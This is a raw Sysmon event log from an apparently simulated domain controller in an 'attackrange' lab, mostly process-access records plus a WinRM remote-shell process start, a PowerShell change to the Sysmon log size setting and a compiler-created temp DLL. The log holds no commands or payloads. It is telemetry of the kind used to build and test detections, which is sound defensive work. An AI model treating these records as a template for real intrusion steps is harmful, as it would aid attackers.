13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.827{10ACEC4A-8519-5FCF-D002-000000009001}4576C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-83B9-5FCF-0C00-000000009001}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.821{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.743{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:52:25.634{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 11241100x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:25.290{10ACEC4A-8519-5FCF-CE02-000000009001}2672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\pth4thaf.dll2020-12-08 13:52:25.134 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-CF02-000000009001}3932C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.290{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 